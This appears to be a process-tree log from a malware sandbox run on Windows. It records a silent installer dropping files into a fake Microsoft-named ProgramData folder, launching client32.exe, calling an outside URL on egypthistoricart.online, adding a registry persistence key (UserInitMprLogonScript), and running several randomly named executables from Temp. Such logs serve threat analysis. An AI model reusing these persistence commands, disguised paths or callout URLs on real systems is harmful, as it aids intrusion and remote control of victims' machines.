C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 28325⤵
- Program crash
PID:6024
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4032
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2256
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4244
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\is-CPVSJ.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-CPVSJ.tmp\IBInstaller_97039.tmp" /SL5="$2035E,14575146,721408,C:\Users\Admin\AppData\Local\Temp\t30p0pu3pd5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:5364
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-3S29C.tmp\{app}\microsoft.cab -F:* %ProgramData%2⤵PID:5908
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-3S29C.tmp\{app}\microsoft.cab -F:* C:\ProgramData3⤵PID:6068
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=2⤵PID:5608
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"2⤵PID:6308
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f2⤵PID:7780
-
-
C:\Users\Admin\AppData\Local\Temp\is-3S29C.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-3S29C.tmp\{app}\chrome_proxy.exe"2⤵PID:6216
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5252
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 752A70A5D577A6C1FA425314E34FA30C C2⤵PID:4304
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 284C4E9F755BF97E4D708C3A45E17B632⤵PID:4820
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:7948
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4004
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3488
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6908
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\8719720596f84898b4c09572fd17bef2 /t 6796 /p 34881⤵PID:7768
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6264
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1210488d-501d-6648-b6c3-a40e6e3bcf14}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:5284
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"2⤵PID:7696
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:7080
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7680
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7756
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6420
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6840
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7468
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6624
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:6704
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\907e132c6f8144feb5703ea90c7d5314 /t 4732 /p 66241⤵PID:7548
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6412
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4356
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:3824
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7744
-
C:\Users\Admin\AppData\Local\Temp\AAAA.exeC:\Users\Admin\AppData\Local\Temp\AAAA.exe1⤵PID:7180
-
C:\Users\Admin\AppData\Local\Temp\ADF6.exeC:\Users\Admin\AppData\Local\Temp\ADF6.exe1⤵PID:6244
-
C:\Users\Admin\AppData\Local\Temp\BF7C.exeC:\Users\Admin\AppData\Local\Temp\BF7C.exe1⤵PID:7244
-
C:\Users\Admin\AppData\Local\Temp\D120.exeC:\Users\Admin\AppData\Local\Temp\D120.exe1⤵PID:4292
-
C:\Users\Admin\AppData\Local\Temp\E16D.exeC:\Users\Admin\AppData\Local\Temp\E16D.exe1⤵PID:4060